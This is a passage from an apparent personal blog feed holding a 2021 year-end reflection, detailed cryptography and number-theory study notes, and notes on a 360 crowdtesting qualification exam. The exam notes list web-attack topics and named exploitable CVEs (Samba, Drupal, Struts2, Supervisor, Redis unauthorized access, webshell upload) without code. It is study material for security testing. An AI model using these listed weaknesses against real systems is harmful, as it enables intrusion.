<content type="html"><![CDATA[<p>Time slips by, and graduation is already near. 2021 passed fairly smoothly.</p><p>I had originally planned to go straight into a job. In March and April I sent out many internship applications and went through several interviews. Most companies never replied, and to this day there is still no response. Only Alibaba was quick, and Meituan the most proactive, with various departments calling frequently. I interviewed at several big tech companies and leading vendor-side firms, none with a satisfying result. I knew I lacked hands-on experience and that it could not be built quickly, so I gave that up and set out on the path of the postgraduate entrance exam.</p><p>There were not many courses in the first half of the year, mostly group projects, and before they wrapped up there was little time to study calmly.</p><ul><li>Information Retrieval: ended with a small web search project covering language-model-based retrieval models, machine-learning-based ranking and web search techniques, text clustering, and so on.</li><li>Content Security: an ad detection project for social media / web pages.</li><li>Public Opinion Analysis: a persona-profiling project on *国 think tanks; the main content was text sentiment analysis.</li></ul><p>Serious review only began in July, during the summer break. For various reasons, and because I did not want to stay at the base any longer, I applied to a school that sets its own exam. Finding materials was hard, there were no past papers, and there were few classmates to discuss things with.</p><p>All the scheduling was up to me, unlike high school, where you just follow the teacher. The road wound back and forth between different teachers and different materials: from Tang Jiafeng to Zhang Yu, then to Mr. Wu. For probability especially, from Yu Bingsen to Tang Jiafeng to Wang Shi'an to Zhang Yu, and finally Fang Hao.</p><p>Over these six months I got to know many genuinely good teachers: Tian Jing, Xu Tao, Wu Zhongxiang, Li Yongle and others. Though we never met, it felt as if they were teaching us face to face, accompanying us the whole way.</p><p>I do not know where I will be in the new year. Whatever the result, heaven will have the best arrangement.</p><p>Keep moving forward.</p>]]></content>
<categories>
<category> Reflections </category>
</categories>
</entry>
<entry>
<title>Cryptography Notes</title>
<link href="/2022/01/03/crypto/"/>
<url>/2022/01/03/crypto/</url>
<content type="html"><![CDATA[<blockquote><p>Study notes on Li Weihai's lecture slides</p></blockquote><h4 id="其他概念"><a href="#其他概念" class="headerlink" title="其他概念"></a>Other concepts</h4><p><strong>Needham-Schroeder protocol</strong>:</p><p>Distributes keys using symmetric cryptography. A and B each share a static key with T. With the help of the trusted authority T, a symmetric key Kab is distributed.</p><p>Polynomial GCD algorithm</p><p>Key point: <strong>modular repeated squaring (square-and-multiply)</strong></p><pre><code class="python">def mod_exp(m, e, n):
    """Compute m^e mod n, scanning the bits e_{k-1} .. e_0 of the exponent from the top."""
    c = 1
    for i in range(e.bit_length() - 1, -1, -1):
        c = (c * c) % n          # square
        if (e >> i) & 1 == 1:    # e_i == 1
            c = (c * m) % n      # multiply
    return c
</code></pre><p>Difficult points: computing the AES MixColumns matrix, and polynomial modular arithmetic over finite fields.</p><p><strong>Involutory algorithms</strong></p><p>An involution is an operation satisfying f = f' (it is its own inverse); addition modulo 2 is an involution.<br>If a cipher is an involution, then the encryption algorithm equals the decryption algorithm, and the engineering implementation effort is halved.</p><p><strong>Homomorphic encryption</strong> is a form of encryption that allows specific algebraic operations to be carried out on ciphertext, producing a result that is still encrypted; decrypting that result gives the same answer as performing the same operation on the plaintext. In other words, it lets one perform operations such as search and comparison on encrypted data and obtain correct results without decrypting the data at any point in the processing. Its significance is that it fundamentally solves the confidentiality problem of delegating data and its processing to a third party, for example in cloud computing applications.</p><p>A <strong>zero-knowledge proof</strong> is a special interactive proof in which the prover knows the answer to a problem and needs to convince the verifier of the fact that "he knows the answer", while the verifier must not obtain any information about the answer.</p><p>A simple example: the prover and the verifier both have a Sudoku puzzle, and the prover knows a solution. He can proceed as follows. He takes 81 cards and writes a digit from 1 to 9 on each, so that there are exactly 9 sets of the digits 1 to 9. Because he knows the solution, he lays all the cards out in a 9-by-9 grid according to it, satisfying the Sudoku constraints (every column, row and 3x3 box contains exactly the digits 1 to 9). He then turns every card face down, so the verifier cannot see the digits. Next the verifier checks the Sudoku conditions: for instance, he picks a column; the prover collects that column's cards, shuffles them, and turns them over, and the verifier sees that each of the digits 1 to 9 appears. Throughout, the verifier never learns the position of any card, yet can confirm that the digits 1 to 9 all appear.</p><p><strong>Letter-frequency attack</strong></p><p>Against the Caesar cipher, the key can be recovered by spotting the peaks of the a-e-i or r-s-t triples, or the signature of jk and xyz.</p><p>Against a monoalphabetic substitution cipher, the steps are:</p><ul><li>Count the frequency of each ciphertext letter</li><li>Compare the counts with the natural-language frequency table to fix part of the key</li><li>Use contact and repetition features to fix more of the key</li><li>Digram and trigram frequency tables are often very helpful</li><li>Guess the rest of the key from the semantics</li></ul><p>A <strong>known-plaintext attack</strong> is an attack model in which the attacker holds some plaintext x and its corresponding ciphertext y.</p><p>All cryptanalysis assumes that the attacker knows the cryptosystem in use; this is Kerckhoffs's assumption. The known-plaintext attack additionally assumes that the attacker can obtain some plaintext and the corresponding ciphertext, for instance by intercepting the beginning of a message and using it to learn the encryption, so as to break the rest of the ciphertext.</p><p>The Hill cipher is hard to break with a ciphertext-only attack but easy to break with a known-plaintext attack.</p><p><strong>Chosen-plaintext attack</strong>: in this model the attacker can choose an arbitrary number of plaintexts in advance, have them encrypted by the algorithm under attack, and obtain the corresponding ciphertexts. The attacker's goal is to gain information about the encryption algorithm that helps break messages encrypted later with the same algorithm (and key). In the worst case the attacker directly obtains the decryption key.</p><p>At first glance this model seems unrealistic, since it is hard to imagine an attacker choosing arbitrary messages and asking the system to encrypt them. In public-key cryptography, however, it is entirely realistic: the encryption key is public, so the attacker can use it to encrypt arbitrary messages directly.</p><p><strong>Chosen-ciphertext attack</strong>: in cryptanalysis, a chosen-ciphertext attack is one in which the attacker has access to the decryption machine and can obtain the plaintext x corresponding to any chosen ciphertext. In this model the cryptanalyst first collects a number of ciphertexts, has them decrypted by the algorithm under attack, and obtains the plaintexts under the unknown key.</p><p>A <strong>ciphertext-only attack</strong> is carried out knowing only the encrypted text (the ciphertext). It applies to both symmetric and asymmetric cryptosystems.<br>Its goals, ordered by degree of success, include:</p><p>Obtaining partial information about the plaintext.<br>Obtaining the plaintext.<br>Obtaining the decryption key.<br>Brute force is a ciphertext-only attack, but algorithm design normally takes brute force into account.</p><p>A <strong>one-time pad</strong> (OTP) is an encryption algorithm from classical cryptography: the plaintext is combined with a random key that is used only once.</p><p>In theory this cipher has perfect secrecy and is unbreakable; its security was proven by Shannon.</p><p>Although its theoretical security is beyond doubt, in practice it has the following problems:</p><p>The pad used for encryption must be truly randomly generated.<br>It must be at least as long as the file being encrypted.<br>It may be used only once and must be carefully kept secret from anyone not involved; when no longer needed it should be destroyed to prevent reuse.</p><p><strong>Birthday attack</strong></p><p>A birthday attack is a cryptographic attack that exploits the mathematics of the birthday problem in probability theory. It can be used to abuse communication between two or more parties. The attack relies on the high collision probability of random trials and the fixed number of permutations (pigeonhole principle). An attacker can find a hash-function collision in</p><p><img src="https://s2.loli.net/2022/02/04/TYV1f5RFnMSIycg.png" alt="image-20210713213656807"></p><p>where 2^n is the preimage-resistance security level.</p><p><strong>Index of coincidence</strong>: the sum of the squares of the letter probabilities is close to 0.065; this value is called the index of coincidence.</p><p><strong>Diffusion</strong>: changing any one bit of the plaintext usually changes about half of the ciphertext bits.</p><p><strong>Confusion</strong>: changing any one bit of the key usually changes about half of the ciphertext bits.</p><p>Diffusion means that each plaintext bit influences many ciphertext bits, or equivalently that each ciphertext bit is influenced by many plaintext bits; this hides the statistical properties of the plaintext. Ideally every plaintext bit influences every ciphertext bit, i.e. every ciphertext bit depends on all plaintext bits.<br>Confusion means making the statistical relationship between ciphertext and key as complex as possible, so that an adversary who obtains some statistics of the ciphertext still cannot deduce the key. Complex non-linear substitutions give good confusion; simple linear substitutions give poor confusion.</p><p><strong>Affine cipher</strong></p><img src="https://s2.loli.net/2022/02/04/7ar2vu5BgimSbEt.png" alt="image-20210919212715548" style="zoom:67%;" /><p>A substitution cipher first builds a substitution table (the key); to encrypt, each plaintext character is looked up in the table and replaced by the corresponding character, and once every character has been replaced the meaningless string that results is the ciphertext.<br>A transposition cipher permutes the positions of the plaintext characters according to some rule.</p><p><strong>Man-in-the-middle attack</strong></p><p>SP network (substitution-permutation network)</p><p>Substitution-Permutation Network, abbreviated SP-network or SPN</p><p>S is usually called the confusion layer and mainly provides confusion<br>P is usually called the diffusion layer and mainly provides diffusion</p><p><strong>Substitution provides confusion; permutation provides diffusion</strong></p><p><strong>DES</strong></p><p>A cipher that operates on binary data<br>and can therefore encrypt and decrypt any form of computer data.</p><p>The S-boxes provide confusion</p><p>Changing any one input bit of an S-box changes at least two output bits</p><p>The permutation P provides diffusion</p><img src="https://s2.loli.net/2022/02/04/qS8OenFyuwxCBrV.png" alt="image-20211110215431361" style="zoom:67%;" /><img src="https://s2.loli.net/2022/02/04/qPegX8ZwhODyN9c.png" alt="image-20211110215415819" style="zoom:67%;" /><p>Weaknesses</p><img src="https://s2.loli.net/2022/02/04/EY3gGtwTCV56mjI.png" alt="image-20211110215618739" style="zoom:50%;" /><p><strong>AES</strong></p><p>A cipher that operates on binary data<br>and can encrypt and decrypt any form of computer data.<br>It is not an involution: encryption and decryption use different algorithms.</p><p>The final round's transformation has no MixColumns step.</p><img src="https://s2.loli.net/2022/02/04/NkzAwQjcs4ZtO3P.png" alt="image-20211114232150250" style="zoom:50%;" /><p>Key backup and recovery applies only to encryption/decryption keys; signing keys cannot be backed up.</p><h4 id="第一章-绪论"><a href="#第一章-绪论" class="headerlink" title="第一章-绪论"></a>Chapter 1: Introduction</h4><p>Basic elements of a cryptosystem:</p><ul><li>The cipher algorithm</li><li>The key</li></ul><p>Mathematical description of a cryptosystem:</p><p>S={P,C,K,E,D}, where the plaintext space P is also often written as the message space M</p><p><img src="https://s2.loli.net/2022/02/04/oKjpl4Y6t1ANLGZ.png" alt="image-20210713213509244"></p><p>Basic principles of modern cryptography:</p><ul><li>Kerckhoffs's principle<br>Even if everything about the cryptosystem except the key is public, it should remain secure.</li><li>Shannon's maxim<br>The enemy knows the system.</li><li>The security of a cryptosystem lies not in keeping the algorithm secret, but in how hard it is to recover the key or the plaintext once the adversary knows the algorithm and the ciphertext.</li></ul><p>Security levels of a cryptosystem:</p><ul><li>Unconditional security</li><li>Provable security</li><li>Computational security</li><li>Practical security</li></ul><p>Ways of encrypting a communication channel:</p><ul><li>Link encryption: point-to-point encryption</li><li>High-level connection encryption: end-to-end encryption</li></ul><p>Encryption of stored data:</p><ul><li>Disk-level encryption</li><li>File-level encryption</li></ul><p>Attack methods</p><table><thead><tr><th><strong>Attack type</strong></th><th><strong>Resources available to the cryptanalyst</strong></th></tr></thead><tbody><tr><td><strong>Ciphertext-only attack</strong> Ciphertext-only</td><td>Cipher algorithm; ciphertext to be analysed</td></tr><tr><td><strong>Known-plaintext attack</strong> Known-plaintext</td><td>Cipher algorithm; ciphertext to be analysed; one or more plaintext-ciphertext pairs encrypted under the same key</td></tr><tr><td><strong>Chosen-ciphertext attack</strong> Chosen-ciphertext</td><td>Cipher algorithm; ciphertext to be analysed; chosen ciphertexts and their corresponding plaintexts</td></tr><tr><td><strong>Chosen-plaintext attack</strong> Chosen-plaintext</td><td>Cipher algorithm; ciphertext to be analysed; chosen plaintexts and their corresponding ciphertexts</td></tr><tr><td><strong>Chosen-text attack</strong> Chosen-text</td><td>Cipher algorithm; ciphertext to be analysed; chosen ciphertexts/plaintexts and their corresponding plaintexts/ciphertexts</td></tr><tr><td><strong>Related-key attack</strong> Related-key</td><td>Cipher algorithm; ciphertext to be analysed; plaintext-ciphertext pairs under two keys with a known relation</td></tr></tbody></table><p>Stream ciphers (Stream Cipher)</p><ul><li>Encrypt/decrypt bit by bit (sometimes byte by byte)</li><li>The same plaintext generally yields different ciphertext</li></ul><p>Block ciphers (Block Cipher)</p><ul><li>Process data blocks of several bits (usually more than 64) at a time</li><li>The same plaintext block always yields the same ciphertext block</li></ul><p>Classification by uniqueness of the ciphertext:</p><ul><li>Deterministic cryptosystems</li><li>Probabilistic cryptosystems</li></ul><p>Plaintext: Plaintext, Message</p><p>Ciphertext: Ciphertext</p><p>At present, the common way to judge whether a cryptosystem is secure is to publish it and accept study and attacks from the whole world.</p><h4 id="第二章-经典密码学"><a href="#第二章-经典密码学" class="headerlink" title="第二章-经典密码学"></a>Chapter 2: Classical cryptography</h4><p>Substitution<br>The representation of the plaintext changes while the relative positions of its elements do not<br>Plaintext letters are replaced by the corresponding ciphertext letters</p><p>Transposition (Transposition or Permutation)<br>The relative positions of the plaintext elements change while their representation does not</p><p>Product ciphers (Product Ciphers)<br>Several encryption techniques stacked on top of one another</p><h5 id="算术密码"><a href="#算术密码" class="headerlink" title="算术密码"></a>Arithmetic ciphers</h5><p><strong>1. Shift cipher</strong></p><p>Caesar cipher</p><p>Replace each letter by the k-th letter after it in the alphabet<br>C = E(k, p) = (p+k) mod 26, p = D(k, C) = (C-k) mod 26<br>Some sources hold that Caesar always used k=3</p><p><strong>2. Affine cipher</strong></p><p>Key: a, b<br>Encryption: C = E([a,b], p) = (ap+b) mod 26<br>Decryption: p = D([a,b], C) = ((C-b)/a) mod 26</p><p>When a=1 it degenerates into the Caesar cipher, which is not considered here.<br>When a≠0, b is unrestricted.<br>It is equivalent to an affine encryption with b=0 followed by a Caesar encryption.<br>a is restricted: gcd(a,26)=1<br>a=3,5,7,9,11,15,17,19,21,23,25<br>Otherwise the mapping is not one-to-one<br>Example: with a=2, b=1, p=3->C=7 and p=16->C=7<br>Different plaintexts map to the same ciphertext, so decryption is impossible<br>Key space size 11*26=286</p><p><strong>3. Hill cipher</strong></p><p>Key: m*m key entries</p><p>Encryption: m plaintext letters are encrypted at a time</p><img src="https://i.loli.net/2021/07/21/46I7umDKBhrfzMi.png" alt="image-20210721220734130" style="zoom:67%;" /><img src="https://i.loli.net/2021/07/21/HEd3ZAVWO7P5wus.png" alt="image-20210721220911593" style="zoom:67%;" /><p>Decryption (requires K to be invertible)</p><img src="https://i.loli.net/2021/07/21/1jnopkaXBTLYhJg.png" alt="image-20210721220926003" style="zoom:67%;" /><p>Security: masks frequency information</p><p>Resists ciphertext-only attacks</p><p>Vulnerable to known-plaintext attacks</p><h5 id="代换密码"><a href="#代换密码" class="headerlink" title="代换密码"></a>Substitution ciphers</h5><p>1. Monoalphabetic substitution</p><p>Breaking classical ciphers:</p><ul><li>Frequency features (single letters, digrams, trigrams)</li><li>Contact features</li><li>Repetition features</li></ul><p>2. Playfair cipher: a two-dimensional monoalphabetic substitution</p><p><img src="https://i.loli.net/2021/07/21/btaUz9fE8GHFpoB.png" alt="image-20210721223610875"></p><p>Encryption method:</p><p>Two letters are encrypted or decrypted at a time</p><p>Encryption rules:</p><ul><li>If the two letters are identical, insert the letter x between them.<br>For example, balloon is split as ba lx lo on</li><li>If the two letters are in the same row, each is replaced by the letter to its right.<br>For example ar->RM</li><li>If the two letters are in the same column, each is replaced by the letter below it.<br>For example mu->CM</li><li>Otherwise each is replaced by the letter in its own row and the other letter's column.<br>For example hs->BP; ea->IM or JM</li></ul><p>3. Polyalphabetic substitution (resists letter-frequency attacks)</p><p>4. Vigenère cipher</p><p>Encryption: Ci = E(k, pi) = (pi+ki mod d) mod 26<br>Decryption: pi = D(k, Ci) = (Ci-ki mod d) mod 26</p><p>Attack method:</p><p>Once the number of substitution tables (the key length) d is known, each table can be analysed separately</p><p>Analyse the ciphertext at positions i, i+d, i+2d, … to obtain the key letter ki</p><ul><li>Key: deceptive, d=9; plaintext</li><li>Ciphertext: ZICVTWQNGRZGVTWAVZHCQYGLMGJ</li><li>Rearrange into columns and run a frequency attack on each column</li></ul><p>Finding the key length d</p><p>Kasiski method</p><ul><li>Look for repeated segments in the ciphertext</li><li>Compute the distances between the repeats</li><li>The key length d should be a common divisor of these distances</li></ul><p>5. Autokey cipher</p><p>Encryption/decryption key = "key" + "plaintext"</p><h5 id="置换技术"><a href="#置换技术" class="headerlink" title="置换技术"></a>Transposition techniques</h5><p>Hide information by reordering it</p><h5 id="乘积密码"><a href="#乘积密码" class="headerlink" title="乘积密码"></a>Product ciphers</h5><p>Two substitutions compose into a more complex substitution, equivalent to a single substitution with a more complex rule<br>Two transpositions compose into a more complex transposition, equivalent to a single transposition with a more complex rule<br>Alternating substitution and transposition greatly improves security</p><h4 id="第三章-密码学基础理论(8-4)"><a href="#第三章-密码学基础理论(8-4)" class="headerlink" title="第三章-密码学基础理论(8.4)"></a>Chapter 3: Foundations of cryptography (8.4)</h4><p>Operations on cryptosystems</p><ul><li>Building complex ciphers</li><li>Analysing composed cryptosystems</li></ul><p>1. Prior probability, posterior probability</p><p>2. Closed systems, non-closed systems</p><p><strong>Endomorphic</strong>: Definition: if the message space of cryptosystem T is the same as its ciphertext space, T is called endomorphic.<br>If T is endomorphic, powers of T can be defined:</p><p><strong>Idempotent</strong>: Definition: if cryptosystem T satisfies TT=T, it is called idempotent.<br>The Vigenère cipher is idempotent</p><p>Pure ciphers, mixed ciphers</p><p>Similar cryptosystems</p><p>Information content: H(x)</p><p>Redundancy, redundancy rate</p><p>Perfect secrecy: generally used to encrypt the most important information, or where the message set is small.</p><p>Message equivocation</p><p>Key equivocation</p><p>Unicity distance</p><p>Content: number theory basics</p><h5 id="第一节-有限域"><a href="#第一节-有限域" class="headerlink" title="第一节 有限域"></a>Section 1: Finite fields</h5><p><strong>Groups, rings, fields</strong></p><p>The order of a finite group equals the number of its elements</p><p>Finite groups, commutative (abelian) groups</p><p>Cyclic group: if every element of the group is a power a^k (k an integer) of a fixed element a (a∈G), the group G is called cyclic.<br>The element a generates the group G, or a is a generator of G.</p><p><strong>Relationship diagram</strong></p><p><img src="https://i.loli.net/2021/08/05/RBuJVqm5lUso4p3.png" alt="image-20210805204923411"></p><p><strong>Modular arithmetic</strong></p><p>a = qn + r, 0≤r<n; q=⌊a/n⌋</p><p><img src="https://i.loli.net/2021/08/07/UjVbwM95mTE8tQc.png" alt="image-20210807230847616"></p><p><img src="https://s2.loli.net/2022/02/04/PrdLlkwV4uhD5Jm.png" alt="image-20210913223741755"></p><p><img src="https://s2.loli.net/2022/02/04/tkEDHerg5Gj8PY2.png" alt="image-20210917200006538"></p><p><strong>Congruence</strong></p><p>For integers a, b and n≠0, a and b are congruent modulo n if and only if a-b=kn, written a≡b mod n</p><p>a≡b mod n if and only if a mod n = b mod n</p><p>If a=mb, where a, b, m are integers and b≠0, then b divides a, b is a divisor of a, or a divided by b leaves remainder 0, written b|a</p><p>If n|(a-b), then a≡b mod n</p><p>Additive inverse, multiplicative inverse</p><ul><li>Addition table</li><li>Multiplication table</li><li>Inverse table</li></ul><p>The complete residue system modulo n</p><p><strong>Finite fields</strong></p><p><strong>Polynomial arithmetic</strong></p><p>Polynomial arithmetic over the finite field GF(2^n)</p><p><strong>Prime polynomials</strong></p><p>Any polynomial can be written as f(x)=q(x)g(x)+r(x)<br>r(x) is called the remainder<br>r(x)=f(x) mod g(x)</p><p>If there is no remainder, g(x) divides f(x), written g(x)|f(x)</p><p>If f(x) has no factors other than itself and 1, it is called an irreducible polynomial, or a prime polynomial</p><p>Polynomials with coefficients in GF(p), reduced modulo a prime polynomial, form a field</p><p><strong>Euclidean algorithm</strong></p><pre><code class="plaintext">a can be written as a = kb + r (a, b, k, r all positive integers, r<b), so r = a mod b.
Suppose d is a common divisor of a and b, written d|a, d|b, i.e. both a and b are divisible by d.
Since r = a - kb, dividing both sides by d gives r/d = a/d - kb/d = m; the right-hand side is an integer, so d|r.
Hence d is also a common divisor of b and a mod b.
Suppose d is a common divisor of b and a mod b; then d|b and d|(a-k*b), with k an integer,
so d|a. Hence d is also a common divisor of a and b.
Therefore (a,b) and (b, a mod b) have the same common divisors, so their greatest common divisors must be equal. QED.
</code></pre><pre><code class="plaintext">Any integer that divides both a and b also divides a-b (and b); taking that integer to be gcd(a,b), it is at most the greatest common divisor of a-b and b: gcd(a,b)<=gcd(a-b,b)
Likewise, any integer that divides a-b and b also divides a and b; taking that integer to be gcd(a-b,b), it is at most the greatest common divisor of a and b: gcd(a-b,b)<=gcd(a,b)
Hence gcd(a,b)=gcd(a-b,b)
Since there is always an integer n such that a - n*b = a mod b,
iterating gives gcd(a-b,b)=gcd(a-2b,b)=...=gcd(a-n*b,b)=gcd(a mod b,b)
</code></pre><p>gcd(a,b)=gcd(a mod b, b)</p><p>If a and b have 1 as their only positive common divisor, the integers a and b are coprime, i.e. gcd(a, b)=1</p><p><strong>Extended Euclidean algorithm</strong></p><p>Find d=gcd(a,b) and solve ax+by=d</p><h5 id="第二节-素数"><a href="#第二节-素数" class="headerlink" title="第二节 素数"></a>Section 2: Primes</h5><p>There are infinitely many primes</p><p>Fermat numbers</p><p>Mersenne primes</p><p>Perfect numbers</p><p>Prime factorisation</p><p>Any positive integer can be represented by listing the nonzero exponents of all its prime factors<br>Example: 12 is represented as {a2=2, a3=1}<br>Example: 18 is represented as {a2=1, a3=2}</p><p>Multiplying two numbers is the same as adding the corresponding exponents:<br>K = mn → k_p = m_p + n_p for all p<br>Example: 216 = 12×18 = (2^2×3^1)×(2^1×3^2) = 2^3×3^3</p><p>Greatest common divisor: k=gcd(a,b) <=> k_p=min(a_p,b_p) for all p<br>Example: 300 = 2^2×3^1×5^2, 18 = 2^1×3^2, gcd(18,300) = 2^1×3^1×5^0 = 6</p><p><strong>Fermat's theorem</strong></p><img src="https://i.loli.net/2021/08/07/cXzhNYBFvwraeW2.png" alt="image-20210807223557784" style="zoom: 80%;" /><p><strong>Euler's theorem</strong></p><p><img src="https://i.loli.net/2021/08/08/GzmwgihMy5brRLo.png" alt="image-20210808111928181"></p><p><img src="https://i.loli.net/2021/08/08/1htH3TPo8MV5ynk.png" alt="image-20210808122519540"></p><p><img src="https://i.loli.net/2021/08/08/LlYEVvyS3Crs8Pk.png" alt="image-20210808115027528"></p><p><strong>Chinese remainder theorem</strong></p><img src="https://i.loli.net/2021/08/08/rlMOxLmitIQhfUN.png" alt="image-20210808122417972" style="zoom:67%;" /><p><strong>Order</strong></p><img src="https://i.loli.net/2021/08/08/yNo5dQIETesCPtn.png" alt="image-20210808205302384" style="zoom:80%;" /><p><strong>Primitive roots</strong></p><p><img src="https://i.loli.net/2021/08/08/16C2hWIXPsDeJzS.png" alt="image-20210808205601708"></p><p>The modulus of a primitive root need not be prime: 5 is a primitive root modulo 6</p><p>Primitive roots are not necessarily unique</p><p>All odd numbers are primitive roots modulo 2</p><p><img src="https://i.loli.net/2021/08/08/Nuk31OtlI9qTFov.png" alt="image-20210808210709152"></p><p><img src="https://i.loli.net/2021/08/08/PRhsxig6umQkO7n.png" alt="image-20210808211446013"></p><p><strong>Fundamental theorem of arithmetic</strong></p><p><img src="https://i.loli.net/2021/08/08/yt89C3eGrsFSgp2.png" alt="image-20210808214234027"></p><p>DH algorithm</p><img src="https://i.loli.net/2021/09/02/INCSgadQzt21lpV.png" alt="image-20210902223744193" style="zoom: 50%;" /><img src="https://s2.loli.net/2022/02/04/wnMltXKpydfQ3sA.png" alt="image-20210913221636557" style="zoom:67%;" /><p>Extended Euclidean algorithm</p><p>Finding multiplicative inverses</p><h4 id="第四章-分组密码"><a href="#第四章-分组密码" class="headerlink" title="第四章-分组密码"></a>Chapter 4: Block ciphers</h4><h5 id="第一节-DES"><a href="#第一节-DES" class="headerlink" title="第一节 DES"></a>Section 1: DES</h5><p>Feistel cipher structure</p><p>DES has a 64-bit key</p><p>Only 56 bits are actually used</p><p>The rest are used for parity and the like</p><p>The avalanche effect is an unstable equilibrium and a characteristic of encryption algorithms: a small change in the plaintext or key causes a large change in the ciphertext, just as a mountain looks calm before an avalanche but collapses at the slightest disturbance. It applies in many settings; for hash codes, the avalanche effect means that a small change in the message bits changes many bits of the digest. It is a desirable property of encryption algorithms (especially block ciphers and cryptographic hash functions): the smallest change in the input (for example, flipping one bit) causes an indistinguishable change in the output (each output bit flips with probability 50%). In a sound block cipher, any small change in the key or plaintext must cause such an indistinguishable change in the ciphertext.</p><p>Building a cipher or hash with a good avalanche effect is one of the crucial design goals.</p><p>Timing attacks</p><p>Power analysis attacks</p><p>DES resists timing attacks well</p><p>DES does not resist differential or linear cryptanalysis</p><p>Differential cryptanalysis</p><ul><li>Analyse the relationship between differences of plaintext pairs and differences of ciphertext pairs</li><li>Determine the round subkeys and thereby recover some key bits</li></ul><p>Linear cryptanalysis</p><p>DES design criteria</p><h5 id="第二节有限域计算"><a href="#第二节有限域计算" class="headerlink" title="第二节有限域计算"></a>Section 2: Finite field computation</h5><h5 id="第三节-AES"><a href="#第三节-AES" class="headerlink" title="第三节 AES"></a>Section 3: AES</h5><p>Key lengths: 128, 192, 256</p><p>Not a Feistel structure</p><p>The SubBytes, ShiftRows and MixColumns stages together provide confusion, diffusion and non-linearity. These stages do not involve the key and by themselves provide no security</p><img src="https://s2.loli.net/2022/02/04/KPJv3nkTxh6o9IQ.png" alt="image-20210917224400452" style="zoom:67%;" /><h5 id="第四节-分组密码工作模式"><a href="#第四节-分组密码工作模式" class="headerlink" title="第四节 分组密码工作模式"></a>Section 4: Block cipher modes of operation</h5><p><img src="https://s2.loli.net/2022/02/04/hr1TCDH7ZxYVjEy.png" alt="image-20210917233643054"></p><p>Advantages and disadvantages of the different modes.</p><h5 id="第五节-其他密码"><a href="#第五节-其他密码" class="headerlink" title="第五节 其他密码"></a>Section 5: Other ciphers</h5><img src="https://s2.loli.net/2022/02/04/2iWRCk96Kqce41H.png" alt="image-20210922095840573" style="zoom: 67%;" /><h4 id="第五章-流密码"><a href="#第五章-流密码" class="headerlink" title="第五章-流密码"></a>Chapter 5: Stream ciphers</h4><p>Classification:</p><ul><li>Synchronous stream ciphers</li><li>Self-synchronizing stream ciphers</li></ul><h4 id="第六章-公钥密码"><a href="#第六章-公钥密码" class="headerlink" title="第六章-公钥密码"></a>Chapter 6: Public-key cryptography</h4><h4 id="第七章-消息认证"><a href="#第七章-消息认证" class="headerlink" title="第七章-消息认证"></a>Chapter 7: Message authentication</h4><h5 id="1-消息认证"><a href="#1-消息认证" class="headerlink" title="1.消息认证"></a>1. Message authentication</h5><h5 id="2-散列算法"><a href="#2-散列算法" class="headerlink" title="2.散列算法"></a>2. Hash algorithms</h5><h5 id="3-MAC算法"><a href="#3-MAC算法" class="headerlink" title="3.MAC算法"></a>3. MAC algorithms</h5><p>A hash is unkeyed</p><p>A MAC is keyed</p><p>Birthday paradox</p><img src="https://s2.loli.net/2022/02/04/RTt3lE5zNJ1YHCp.png" alt="image-20210926214703360" style="zoom:67%;" /><p>For a hash function with n-bit output, the birthday attack costs $2^{n/2}$</p><h4 id="第八章-数字签名"><a href="#第八章-数字签名" class="headerlink" title="第八章-数字签名"></a>Chapter 8: Digital signatures</h4><h4 id="第九章-密钥管理"><a href="#第九章-密钥管理" class="headerlink" title="第九章-密钥管理"></a>Chapter 9: Key management</h4><p>1. Encryption</p><ul><li>Link encryption</li><li>End-to-end encryption</li></ul><p>2. The security of a cryptosystem depends on the strength of the algorithm and the length of the key</p>]]></content>
<categories>
<category> 密码学 </category>
</categories>
<tags>
<tag> 密码学 </tag>
</tags>
</entry>
<entry>
<title>Studying Elementary Number Theory</title>
<link href="/2021/08/06/%E6%95%B0%E8%AE%BA/"/>
<url>/2021/08/06/%E6%95%B0%E8%AE%BA/</url>
<content type="html"><![CDATA[<blockquote><p>Filling in the mathematical foundations of information security as groundwork for cryptography: a study of elementary number theory</p></blockquote><p><strong>Number-theoretic foundations of cryptography</strong></p><ul><li>Divisibility and division with remainder</li><li>Euclidean algorithm</li><li>Modular arithmetic</li><li>Primes</li><li>Fermat's and Euler's theorems</li><li>Primality testing</li><li>Chinese remainder theorem</li><li>Discrete logarithms</li></ul><p><strong>Study plan</strong></p><ul><li>Discreteness of the integers</li><li>Divisibility: concept and properties</li><li>Division with remainder</li><li>Euclidean algorithm</li><li>Extended Euclidean algorithm</li><li>Bézout's theorem</li><li>Primes and composites</li><li>Fundamental theorem of arithmetic</li><li>Common divisors and common multiples</li><li>Congruence: concept and properties</li><li>Congruence classes and residue systems</li><li>Fermat's little theorem</li><li>Euler's theorem</li><li>Chinese remainder theorem</li><li>Lagrange's theorem</li><li>Wolstenholme's theorem</li><li>Quadratic residues and Euler's criterion</li><li>Gauss's lemma</li><li>Quadratic reciprocity</li><li>Primitive roots</li><li>Gauss function</li><li>Bitwise operations and number bases</li></ul>]]></content>
<categories>
<category> 密码学 </category>
</categories>
<tags>
<tag> 数论 </tag>
<tag> 密码学 </tag>
</tags>
</entry>
<entry>
<title>Notes on a 360 Zhongce (Crowdtesting) Qualification Exam</title>
<link href="/2021/06/01/360/"/>
<url>/2021/06/01/360/</url>
<content type="html"><![CDATA[<p>The site is:</p><p><a href="https://zhongce.360.cn/">https://zhongce.360.cn/</a></p><p>To take part in 360 crowdtesting you need to register, log in, and pass a qualification exam.</p><p><strong>Exam content</strong>:</p><p>1. Multiple-choice questions</p><p>2. True/false questions</p><p>3. Practical questions (worth the most points)</p><p>The questions are all fairly easy; the practical part is in CTF form, and capturing more than half of the flags should be enough to pass.</p><p><strong>Main question types:</strong></p><p>1. Assorted web vulnerabilities</p><ul><li>SQL injection</li><li>XSS (cross-site scripting)</li><li>File upload</li><li>Command execution</li><li>Editor vulnerabilities</li></ul><p>2. Traffic analysis</p><p>Fairly easy; knowing how to use Wireshark to analyze simple packets is enough.</p><p>3. CMS</p><p>Analysis questions targeting specific CMS systems.</p><p>4. CVE</p><p>Reproduction and analysis of classic CVEs.</p><p><strong>A few frequently tested topics:</strong></p><ul><li>GET\POST</li><li>CVE-2011-3923 (Struts2)</li><li>Webshell upload</li><li>Samba remote command execution (CVE-2017-7494)</li><li>Drupal 7 CVE-2018-7600</li><li>PHP file inclusion (www.zip source archive)</li><li>Redis unauthorized access on port 6379</li><li>Wireshark traffic analysis (xiaoma.php)</li><li>File upload bypass techniques</li><li>SQL injection (sqlmap) (you need to know where the injection point is)</li><li>Code auditing (PHP weak typing)</li><li>rsync service on port 873</li><li>Backdoor scanning</li><li>Supervisor remote command execution (CVE-2017-11610)</li><li>User-Agent header 